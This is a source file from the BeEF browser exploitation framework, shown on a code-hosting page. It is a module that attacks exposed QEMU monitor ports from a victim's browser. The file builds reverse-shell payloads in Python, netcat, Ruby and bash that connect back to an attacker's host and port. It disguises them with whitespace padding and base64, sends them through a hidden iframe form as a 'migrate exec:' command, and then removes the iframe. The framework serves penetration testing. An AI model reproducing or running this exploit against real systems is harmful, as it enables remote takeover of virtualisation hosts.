Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/qemu_monitor_migrate_cmd_exec/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8
  var rhost = '<%= @rhost %>';

9
  var rport = '<%= @rport %>';

10
  var lhost = '<%= @lhost %>';

11
  var lport = '<%= @lport %>';

12
  var timeout = 5;

13
  var payload_name = '<%= @payload %>';

14
  var peer = rhost + ':' + rport;

15


16
  payload = function() {

17
    var whitespace = '';

18
    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';

19
    var payload = '';

20
    switch (payload_name) {

21
      case "reverse_python2":

22
        var cmd = "import socket,subprocess,os;host='"+lhost+"';port="+lport+";s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

23
        cmd = cmd.replace(/,/g, whitespace+','+whitespace).replace(/;/g, whitespace+';'+whitespace)

24
        var encoded_cmd = btoa(cmd);

25
        payload = "/usr/bin/python2 -c \\\"exec ( '" + encoded_cmd + "'.decode ( 'base64' ) )\\\"";

26
        payload = payload.replace(/ /g, whitespace);

27
        break;

28
      case "reverse_netcat":

29
        payload = "/bin/nc " + lhost + " " + lport + " -e /bin/sh";

30
        payload = payload.replace(/ /g, whitespace);

31
        break;

32
      case "reverse_ruby":

33
        payload = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\\\"" + lhost + "\\\",\\\"" + lport + "\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end'"

34
        payload = payload.replace(/ /g, whitespace);

35
        break;

36
      default: // "reverse_bash"

37
        payload = "/bin/bash -c '/bin/bash -i >& /dev/tcp/" + lhost + "/" + lport + " 0>&1'";

38
        payload = payload.replace(/ /g, whitespace);

39
        break;

40
    }

41
    return 'migrate "exec:' + payload + '"'

42
  }

43


44
  try {

45
    var code = payload();

46
    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Sending payload (" + code.length + " bytes)");

47
    var iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);

48
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

49
  } catch(e) {

50
    beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Exploit failed: " + e.message);

51
  }

52


53
  cleanup = function() {

54
    try {

55
      document.body.removeChild(iframe_<%= @command_id %>);

56
    } catch(e) {

57
      beef.debug("[qemu_monitor_migrate_cmd_exec] Could not remove iframe: " + e.message);

58
    }

59
  } 

60
  setTimeout("cleanup()", timeout*1000);

61


62
});

63


64